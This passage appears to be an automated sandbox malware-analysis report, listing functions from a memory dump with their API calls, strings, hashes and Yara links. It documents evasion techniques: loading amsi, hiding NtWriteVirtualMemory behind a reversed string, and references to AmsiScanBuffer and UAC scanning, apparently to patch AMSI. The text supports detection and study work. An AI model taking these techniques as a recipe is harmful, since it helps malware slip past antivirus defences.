API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: c9bda85c863765acb5c1b6f75b978e07564652d90abb7074abb57471ef958434
Instruction ID: 0f421fb79fafcce328faf3b59a115f4d0a136c8e67dfcb6ac61224242e3baa54
Opcode Fuzzy Hash: c9bda85c863765acb5c1b6f75b978e07564652d90abb7074abb57471ef958434
Instruction Fuzzy Hash: 17411A35A50109AFEF10FBA4C880A9EB3FAEF8D710F2148B6E145A7250DA75ED05CF61

Function 02B97D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B98020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
Part of subcall function 02B98020: GetModuleHandleA.KERNELBASE(?), ref: 02B98072

Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B97D74

Strings

yromeMlautriVetirW, xrefs: 02B97D1B
Ntdll, xrefs: 02B97D4B

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 2719805696-3542721025
Opcode ID: 19cab1c90364cac34d5bf163d149575017ddad3ddd36c62028e8cb5d04880178
Instruction ID: e094ef83edf11302806c6ba056f9d0212032e2f9fe6f7aa7b7911ea9d88f5965
Opcode Fuzzy Hash: 19cab1c90364cac34d5bf163d149575017ddad3ddd36c62028e8cb5d04880178
Instruction Fuzzy Hash: C50100B5610205BFEF00EFA8D841E9EB7FDEB49710F9184A1F508D7A50DA70AD10DB64

Function 02B96D50 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

Part of subcall function 02B96CF4: CLSIDFromProgID.OLE32(00000000,?,00000000,02B96D41,?,?,?,00000000), ref: 02B96D21

CoCreateInstance.OLE32(?,00000000,00000005,02B96E34,00000000,00000000,02B96DB3,?,00000000,02B96E23), ref: 02B96D9F

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 844ce991050213c7e4c6c7711024c96a84a136f00df133a29fed2a8a42122533
Instruction ID: b39a8014757d4a89ff599e240ba940b06504358eab89bdd22ad5856ccb602f0e
Opcode Fuzzy Hash: 844ce991050213c7e4c6c7711024c96a84a136f00df133a29fed2a8a42122533
Instruction Fuzzy Hash: E201F271608B04AFEB05EF65DC5296BBBBDEB49B10B5244B6F905D2650E6308E10C960

Function 02B81724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,02B82000), ref: 02B817D0
Sleep.KERNEL32(0000000A,00000000,?,02B82000), ref: 02B817E6

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: dcbeaecd44160ed00bb6c443458a14230e2c632fdb58d54930102f9940a38e05
Instruction ID: 4659c0edcf4ed7d2172b18ebae85d2bc287b7919121400b5240255bb426656ce
Opcode Fuzzy Hash: dcbeaecd44160ed00bb6c443458a14230e2c632fdb58d54930102f9940a38e05
Instruction Fuzzy Hash: 41B10E76A123418BDB15EF2CD890395BBE1EB85390F0886AED55DCF285E770E452CB90

Function 02B9870C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 02B98715

Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D

Part of subcall function 02B97D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B97D74

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B98774

Strings

W, xrefs: 02B98721
DllGetClassObject, xrefs: 02B9873A
amsi, xrefs: 02B98710

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 941070894-2671292670
Opcode ID: c566c85ba6d9c4aa4ad4b05de9c60ff6652dadfc482011fc61fbe8fdcf7fecca
Instruction ID: 7300798bce4279369654a749e424877ccd92494a5b572c662c1d0fcac9e8f51e
Opcode Fuzzy Hash: c566c85ba6d9c4aa4ad4b05de9c60ff6652dadfc482011fc61fbe8fdcf7fecca
Instruction Fuzzy Hash: D4F0A4B010C38179E601E7748C45F4FBFCD4B52224F048AACF1E8562D2D679D10497A7

Function 02B81A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,02B81FE4), ref: 02B81B17
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02B81FE4), ref: 02B81B31

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: ce04d7b0d056510b68052f454514901f0fc02d285d965b88d6881baf796bc048
Instruction ID: 26725217c729d7ff251816e8f5c08fcca02ecd81aa265773516848e1e053c8bb
Opcode Fuzzy Hash: ce04d7b0d056510b68052f454514901f0fc02d285d965b88d6881baf796bc048
Instruction Fuzzy Hash: 6151EE716222408FE715EF6CC9847A6BBD0EF45314F1885EEE54CCB282E770C846CBA1

Function 02B9E2F6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B9E436

Strings

OpenSession, xrefs: 02B9E3D8
ScanBuffer, xrefs: 02B9E37F
Initialize, xrefs: 02B9E326

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 22c35f11a8b72007e3651fa9d1b25c64aee6d52b5147cf307d994705840eff07
Instruction ID: 739d1446f386749088442c03efebcaf91c96b8ad69653babc91da527cde85ad6
Opcode Fuzzy Hash: 22c35f11a8b72007e3651fa9d1b25c64aee6d52b5147cf307d994705840eff07
Instruction Fuzzy Hash: 0A410835A50109AFEB10FBA4C880A9EB3FAEF89710F2148B6E145A7250DA75ED05CF61

Function 02B8E2EC Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantClear.OLEAUT32(?), ref: 02B8E2FB

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 14beb617443578ad59f747a29bb65dfdb10a2dd5eae48a511f3b8e1777693c0c
Instruction ID: 1859afdcfd286aa93c3a75f9b7c87125ffbd20b7450086943ffe964d69a4c1ee
Opcode Fuzzy Hash: 14beb617443578ad59f747a29bb65dfdb10a2dd5eae48a511f3b8e1777693c0c
Instruction Fuzzy Hash: 45F0F660704200C7CB26BB38DCC4A6D279AAF81710B50D4F6F48E9B255CB34DC45DB62

Function 02B84CFC Relevance: 4.5, APIs: 3, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32(02B9E950), ref: 02B84C1A
SysAllocStringLen.OLEAUT32(?,?), ref: 02B84D07
SysFreeString.OLEAUT32(00000000), ref: 02B84D19

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 3eeefc98fc1f04147ed25a8ce99a5ae7040bba417c0213ea99b3a05aecf1f654
Instruction ID: b3c61be89990536d5091799c2d160b0c2d3a2110da915f46c909d2db59ea3543
Opcode Fuzzy Hash: 3eeefc98fc1f04147ed25a8ce99a5ae7040bba417c0213ea99b3a05aecf1f654
Instruction Fuzzy Hash: AAE0ECB81162025EEA143F259840B37377AEF81751B1444D9A94CCA150E734C842EE35

Function 02B97064 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32(?), ref: 02B97362

Strings

H, xrefs: 02B97119

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: cc7b8efecc1a41c0e75ce93187331374d604b861dac0e4e982e71438d6db435f
Instruction ID: 3897a4337b0f9eb21e0ab62e6bcaccd4f86bbe47285dbb80255d5f753c4e5d43
Opcode Fuzzy Hash: cc7b8efecc1a41c0e75ce93187331374d604b861dac0e4e982e71438d6db435f
Instruction Fuzzy Hash: 5AB1E4B4A116089FDB14CF99D880A9DFBF2FF4A314F2485A9E845AB360DB31AC45DF50

Function 02B98824 Relevance: 3.1, APIs: 2, Instructions: 65
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00000000,00000000,02B9890B), ref: 02B98858

Part of subcall function 02B98020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
Part of subcall function 02B98020: GetModuleHandleA.KERNELBASE(?), ref: 02B98072

Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D

Part of subcall function 02B97D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B97D74

FreeLibrary.KERNEL32(74BF0000,00000000,02BE1388,Function_000065D8,00000004,02BE1398,02BE1388,05F5E0FF,00000040,02BE139C,74BF0000,00000000,00000000,00000000,00000000,02B9890B), ref: 02B988EB

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: HandleModule$AddressLibraryProc$FreeLoadMemoryVirtualWrite
String ID:
API String ID: 3283153180-0
Opcode ID: bd85bd89ca380081145391118e2c278bbe93d12e23870aed4cf5a1183082fb03
Instruction ID: e17f84f32e0cd69a58b70d613c44507779445a2b0937006cdc1aaac55e2c3e7c
Opcode Fuzzy Hash: bd85bd89ca380081145391118e2c278bbe93d12e23870aed4cf5a1183082fb03
Instruction Fuzzy Hash: 0C115170A50304BFEF10FBA8C802A5E77A9DB46700F6048F4B60DEBA91DA349D10DB54

Function 02B8E6E8 Relevance: 3.1, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 02B8E709

Part of subcall function 02B8E2EC: VariantClear.OLEAUT32(?), ref: 02B8E2FB

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: 17c611584ad7faeb75da1bdde0fef493f94f38fb8c05fe8df8bff5fb1dd233cb
Instruction ID: 7bf1e3ded4864f61c59ca6fb385dc82c66579b4beab6ad006c9d07fb8418dab2
Opcode Fuzzy Hash: 17c611584ad7faeb75da1bdde0fef493f94f38fb8c05fe8df8bff5fb1dd233cb
Instruction Fuzzy Hash: 9211A138B0022097CB25BF28CDC466677EADF9575071494E6FA4E8B256EB30CC41CBA6

Function 02B8E384 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 02B8E3C4

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 725dba8cb5c154333cb87e7b6164a9ec58bdf03e4951308d089867005896803d
Instruction ID: 7459cb3b45086b9843a14ecb74db08cf89c1c6687e534473154925d9846e5890
Opcode Fuzzy Hash: 725dba8cb5c154333cb87e7b6164a9ec58bdf03e4951308d089867005896803d
Instruction Fuzzy Hash: 45313E71A04209EFDB51EEA8C984AAE77E8EB0C304F5C45A5F90DD7250E734ED51CBA2

Function 02B96CF4 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,02B96D41,?,?,?,00000000), ref: 02B96D21

Part of subcall function 02B84C0C: SysFreeString.OLEAUT32(02B9E950), ref: 02B84C1A

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: 6dbd5b4a5e2b5b0e51e709b875c5c551933ac6b32bfbbb77beffd082d38bf79c
Instruction ID: a601ffd8b5705a7334021983f46006c7c67abda5e7a717a6fbe6ea5908073057
Opcode Fuzzy Hash: 6dbd5b4a5e2b5b0e51e709b875c5c551933ac6b32bfbbb77beffd082d38bf79c
Instruction Fuzzy Hash: DCE06D71604208BBEB05FBA5DC5196A7BFDEF49B50B5148F1F809D3650EA74AE00D960

Function 02B85814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(02B80000,?,00000105), ref: 02B85832

Part of subcall function 02B85A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B80000,02BAD790), ref: 02B85A94
Part of subcall function 02B85A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B80000,02BAD790), ref: 02B85AB2
Part of subcall function 02B85A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B80000,02BAD790), ref: 02B85AD0
Part of subcall function 02B85A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B85AEE
Part of subcall function 02B85A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B85B37
Part of subcall function 02B85A78: RegQueryValueExA.ADVAPI32(?,02B85CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B85B7D,?,80000001), ref: 02B85B55
Part of subcall function 02B85A78: RegCloseKey.ADVAPI32(?,02B85B84,00000000,?,?,00000000,02B85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B85B77

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
Instruction ID: d01aebe5f3ee74a37beebc83f3a2725b4e35dbfb7d38b7a93b1a8557ac7caea0
Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
Instruction Fuzzy Hash: D6E06D71A002148BCB20EE5C88C0A5637D8AB08750F4105A5EC58DF34AD370E9508BD0

Function 02B87E3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02BA2A49,ScanString,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,Initialize), ref: 02B87E47

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
Instruction ID: 5d49e2497d2d98d416ca165942b691ad1d6fbc53eecc5d21f091d2c5875c8d97
Opcode Fuzzy Hash: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
Instruction Fuzzy Hash: F7C08CA62022090E5E60B2FC1CC069A42CE8B1423A3B01FE1E53CDA1CADB11D822B410

Function 02B87E18 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02B9F8CC,ScanString,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,UacScan,02BE137C,02BAAFD8,UacInitialize), ref: 02B87E23

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
